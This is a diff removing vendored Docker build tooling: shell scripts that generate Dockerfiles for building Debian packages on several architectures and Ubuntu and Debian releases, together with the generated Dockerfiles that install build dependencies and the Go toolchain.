-		# - libdevmapper-dev is missing critical structs (too old)
-		packages=( "${packages[@]/libdevmapper-dev}" )
-		extraBuildTags+=' exclude_graphdriver_devicemapper'
-
-		# - btrfs-tools is missing "ioctl.h" (too old), so it's useless
-		#   (since kernels on precise are old too, just skip btrfs entirely)
-		packages=( "${packages[@]/btrfs-tools}" )
-		extraBuildTags+=' exclude_graphdriver_btrfs'
-	fi
-
-	if [ "$suite" = 'wheezy' ]; then
-		# pull a couple packages from backports explicitly
-		# (build failures otherwise)
-		backportsPackages=( btrfs-tools )
-		for pkg in "${backportsPackages[@]}"; do
-			packages=( "${packages[@]/$pkg}" )
-		done
-		echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
-	fi
-
-	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile"
-	echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
-	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	# print build tags in alphabetical order
-	buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
-
-	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
-	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile
deleted file mode 100644
index aa027f83b3..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
-#
-
-FROM ubuntu:precise
-
-RUN apt-get update && apt-get install -y apparmor bash-completion  build-essential cmake curl ca-certificates debhelper dh-apparmor  git libapparmor-dev  libltdl-dev  libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor exclude_graphdriver_btrfs exclude_graphdriver_devicemapper pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile
deleted file mode 100644
index b03a853ed6..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
-#
-
-FROM ubuntu:trusty
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile
deleted file mode 100644
index af03f6226f..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
-#
-
-FROM ubuntu:xenial
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile
deleted file mode 100644
index 5ac1edf1a4..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
-#
-
-FROM ubuntu:yakkety
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile
deleted file mode 100644
index a4ac781eb9..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile
+++ /dev/null
@@ -1,20 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
-#
-
-FROM armhf/debian:jessie
-
-# allow replacing httpredir or deb mirror
-ARG APT_MIRROR=deb.debian.org
-RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh
deleted file mode 100755
index e110a219ab..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh
+++ /dev/null
@@ -1,158 +0,0 @@
-#!/bin/bash
-set -e
-
-# usage: ./generate.sh [versions]
-#    ie: ./generate.sh
-#        to update all Dockerfiles in this directory
-#    or: ./generate.sh debian-jessie
-#        to only update debian-jessie/Dockerfile
-#    or: ./generate.sh debian-newversion
-#        to create a new folder and a Dockerfile within it
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-versions=( "$@" )
-if [ ${#versions[@]} -eq 0 ]; then
-	versions=( */ )
-fi
-versions=( "${versions[@]%/}" )
-
-for version in "${versions[@]}"; do
-	distro="${version%-*}"
-	suite="${version##*-}"
-	from="${distro}:${suite}"
-
-	case "$from" in
-		raspbian:jessie)
-			from="resin/rpi-raspbian:jessie"
-			;;
-		*)
-			from="armhf/$from"
-			;;
-	esac
-
-	mkdir -p "$version"
-	echo "$version -> FROM $from"
-	cat > "$version/Dockerfile" <<-EOF
-		#
-		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
-		#
-
-		FROM $from
-	EOF
-
-	echo >> "$version/Dockerfile"
-
-	if [[ "$distro" = "debian" || "$distro" = "raspbian" ]]; then
-		cat >> "$version/Dockerfile" <<-'EOF'
-			# allow replacing httpredir or deb mirror
-			ARG APT_MIRROR=deb.debian.org
-			RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-		EOF
-
-		if [ "$suite" = "wheezy" ]; then
-			cat >> "$version/Dockerfile" <<-'EOF'
-				RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list
-			EOF
-		fi
-
-		echo "" >> "$version/Dockerfile"
-	fi
-
-	extraBuildTags='pkcs11'
-	runcBuildTags=
-
-	# this list is sorted alphabetically; please keep it that way
-	packages=(
-		apparmor # for apparmor_parser for testing the profile
-		bash-completion # for bash-completion debhelper integration
-		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
-		build-essential # "essential for building Debian packages"
-		cmake # tini dep
-		curl ca-certificates # for downloading Go
-		debhelper # for easy ".deb" building
-		dh-apparmor # for apparmor debhelper
-		dh-systemd # for systemd debhelper integration
-		git # for "git commit" info in "docker -v"
-		libapparmor-dev # for "sys/apparmor.h"
-		libdevmapper-dev # for "libdevmapper.h"
-		libltdl-dev # for pkcs11 "ltdl.h"
-		libseccomp-dev  # for "seccomp.h" & "libseccomp.so"
-		libsqlite3-dev # for "sqlite3.h"
-		pkg-config # for detecting things like libsystemd-journal dynamically
-		vim-common # tini dep
-	)
-	# packaging for "sd-journal.h" and libraries varies
-	case "$suite" in
-		precise|wheezy) ;;
-		jessie|trusty) packages+=( libsystemd-journal-dev );;
-		*) packages+=( libsystemd-dev );;
-	esac
-
-	# debian wheezy & ubuntu precise do not have the right libseccomp libs
-	# debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :(
-	case "$suite" in
-		precise|wheezy|jessie|trusty)
-			packages=( "${packages[@]/libseccomp-dev}" )
-			runcBuildTags="apparmor selinux"
-			;;
-		*)
-			extraBuildTags+=' seccomp'
-			runcBuildTags="apparmor seccomp selinux"
-			;;
-	esac
-
-
-	if [ "$suite" = 'precise' ]; then
-		# precise has a few package issues
-
-		# - dh-systemd doesn't exist at all
-		packages=( "${packages[@]/dh-systemd}" )
-
-		# - libdevmapper-dev is missing critical structs (too old)
-		packages=( "${packages[@]/libdevmapper-dev}" )
-		extraBuildTags+=' exclude_graphdriver_devicemapper'
-
-		# - btrfs-tools is missing "ioctl.h" (too old), so it's useless
-		#   (since kernels on precise are old too, just skip btrfs entirely)
-		packages=( "${packages[@]/btrfs-tools}" )
-		extraBuildTags+=' exclude_graphdriver_btrfs'
-	fi
-
-	if [ "$suite" = 'wheezy' ]; then
-		# pull a couple packages from backports explicitly
-		# (build failures otherwise)
-		backportsPackages=( btrfs-tools )
-		for pkg in "${backportsPackages[@]}"; do
-			packages=( "${packages[@]/$pkg}" )
-		done
-		echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
-	fi
-
-	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile"
-	if [ "$distro" == 'raspbian' ];
-	then
-		cat <<EOF >> "$version/Dockerfile"
-# GOARM is the ARM architecture version which is unrelated to the above Golang version
-ENV GOARM 6
-EOF
-	fi
-	echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
-	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	# print build tags in alphabetical order
-	buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
-
-	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
-	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile
deleted file mode 100644
index 4dbfd093d8..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile
+++ /dev/null
@@ -1,22 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
-#
-
-FROM resin/rpi-raspbian:jessie
-
-# allow replacing httpredir or deb mirror
-ARG APT_MIRROR=deb.debian.org
-RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-# GOARM is the ARM architecture version which is unrelated to the above Golang version
-ENV GOARM 6
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile
deleted file mode 100644
index b36c1dac71..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
-#
-
-FROM armhf/ubuntu:trusty
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile
deleted file mode 100644
index b5e55ad2dd..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
-#
-
-FROM armhf/ubuntu:xenial
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile
deleted file mode 100644
index 69c2e7f2d4..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
-#
-
-FROM armhf/ubuntu:yakkety
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh
deleted file mode 100755
index 7d22e8c47f..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh
+++ /dev/null
@@ -1,10 +0,0 @@
-#!/bin/bash
-set -e 
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-set -x
-./generate.sh
-for d in */; do
-	docker build -t "dockercore/builder-deb:$(basename "$d")" "$d"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh
deleted file mode 100755
index 0e20b9c4b5..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh
+++ /dev/null
@@ -1,103 +0,0 @@
-#!/bin/bash
-set -e
-
-# This file is used to auto-generate Dockerfiles for making debs via 'make deb'
-#
-# usage: ./generate.sh [versions]
-#    ie: ./generate.sh
-#        to update all Dockerfiles in this directory
-#    or: ./generate.sh ubuntu-xenial
-#        to only update ubuntu-xenial/Dockerfile
-#    or: ./generate.sh ubuntu-newversion
-#        to create a new folder and a Dockerfile within it
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-versions=( "$@" )
-if [ ${#versions[@]} -eq 0 ]; then
-	versions=( */ )
-fi
-versions=( "${versions[@]%/}" )
-
-for version in "${versions[@]}"; do
-	echo "${versions[@]}"
-	distro="${version%-*}"
-	suite="${version##*-}"
-	from="ppc64le/${distro}:${suite}"
-
-	mkdir -p "$version"
-	echo "$version -> FROM $from"
-	cat > "$version/Dockerfile" <<-EOF
-		#
-		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"!
-		#
-
-		FROM $from
-
-	EOF
-
-	extraBuildTags='pkcs11'
-	runcBuildTags=
-
-	# this list is sorted alphabetically; please keep it that way
-	packages=(
-		apparmor # for apparmor_parser for testing the profile
-		bash-completion # for bash-completion debhelper integration
-		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
-		build-essential # "essential for building Debian packages"
-		cmake # tini dep
-		curl ca-certificates # for downloading Go
-		debhelper # for easy ".deb" building
-		dh-apparmor # for apparmor debhelper
-		dh-systemd # for systemd debhelper integration
-		git # for "git commit" info in "docker -v"
-		libapparmor-dev # for "sys/apparmor.h"
-		libdevmapper-dev # for "libdevmapper.h"
-		libltdl-dev # for pkcs11 "ltdl.h"
-		libsqlite3-dev # for "sqlite3.h"
-		pkg-config # for detecting things like libsystemd-journal dynamically
-		vim-common # tini dep
-	)
-
-	case "$suite" in
-		trusty) 
-			packages+=( libsystemd-journal-dev )
-			;;
-		*)
-			# libseccomp isn't available until ubuntu xenial and is required for "seccomp.h" & "libseccomp.so"
-			packages+=( libseccomp-dev )
-			packages+=( libsystemd-dev )
-			;;
-	esac
-
-	# buildtags
-	case "$suite" in
-		# trusty has no seccomp package
-		trusty)
-			runcBuildTags="apparmor selinux"
-		;;
-		# ppc64le support was backported into libseccomp 2.2.3-2,
-		# so enable seccomp by default
-		*)
-			extraBuildTags+=' seccomp'
-			runcBuildTags="apparmor seccomp selinux"
-			;;
-	esac
-	
-	# update and install packages
-	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
-	echo >> "$version/Dockerfile"
-
-	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.ppc64le >> "$version/Dockerfile"
-	echo 'RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
-	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
-	echo >> "$version/Dockerfile"
-
-	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
-	echo >> "$version/Dockerfile"
-
-	# print build tags in alphabetical order
-	buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
-	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
-	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile
deleted file mode 100644
index 4182d683b0..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"!
-#
-
-FROM ppc64le/ubuntu:trusty
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile
deleted file mode 100644
index f1521db72f..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"!
-#
-
-FROM ppc64le/ubuntu:xenial
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile
deleted file mode 100644
index 4f8cc66769..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"!
-#
-
-FROM ppc64le/ubuntu:yakkety
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh
deleted file mode 100755
index 8271d9dc47..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh
+++ /dev/null
@@ -1,10 +0,0 @@
-#!/bin/bash
-set -e
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-set -x
-./generate.sh
-for d in */; do
-	docker build -t "dockercore/builder-deb:$(basename "$d")" "$d"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh
deleted file mode 100755
index b8f5860844..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh
+++ /dev/null
@@ -1,96 +0,0 @@
-#!/bin/bash
-set -e
-
-# This file is used to auto-generate Dockerfiles for making debs via 'make deb'
-#
-# usage: ./generate.sh [versions]
-#    ie: ./generate.sh
-#        to update all Dockerfiles in this directory
-#    or: ./generate.sh ubuntu-xenial
-#        to only update ubuntu-xenial/Dockerfile
-#    or: ./generate.sh ubuntu-newversion
-#        to create a new folder and a Dockerfile within it
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-versions=( "$@" )
-if [ ${#versions[@]} -eq 0 ]; then
-	versions=( */ )
-fi
-versions=( "${versions[@]%/}" )
-
-for version in "${versions[@]}"; do
-	echo "${versions[@]}"
-	distro="${version%-*}"
-	suite="${version##*-}"
-	from="s390x/${distro}:${suite}"
-
-	mkdir -p "$version"
-	echo "$version -> FROM $from"
-	cat > "$version/Dockerfile" <<-EOF
-		#
-		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"!
-		#
-
-		FROM $from
-
-	EOF
-
-	extraBuildTags='pkcs11'
-	runcBuildTags=
-
-	# this list is sorted alphabetically; please keep it that way
-	packages=(
-		apparmor # for apparmor_parser for testing the profile
-		bash-completion # for bash-completion debhelper integration
-		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
-		build-essential # "essential for building Debian packages"
-		cmake # tini dep
-		curl ca-certificates # for downloading Go
-		debhelper # for easy ".deb" building
-		dh-apparmor # for apparmor debhelper
-		dh-systemd # for systemd debhelper integration
-		git # for "git commit" info in "docker -v"
-		libapparmor-dev # for "sys/apparmor.h"
-		libdevmapper-dev # for "libdevmapper.h"
-		libltdl-dev # for pkcs11 "ltdl.h"
-		libseccomp-dev  # for "seccomp.h" & "libseccomp.so"
-		libsqlite3-dev # for "sqlite3.h"
-		pkg-config # for detecting things like libsystemd-journal dynamically
-		libsystemd-dev
-		vim-common # tini dep
-	)
-
-	case "$suite" in
-		# s390x needs libseccomp 2.3.1
-		xenial)
-			# Ubuntu Xenial has libseccomp 2.2.3
-			runcBuildTags="apparmor selinux"
-			;;
-		*)
-			extraBuildTags+=' seccomp'
-			runcBuildTags="apparmor selinux seccomp"
-			;;
-	esac
-
-	# update and install packages
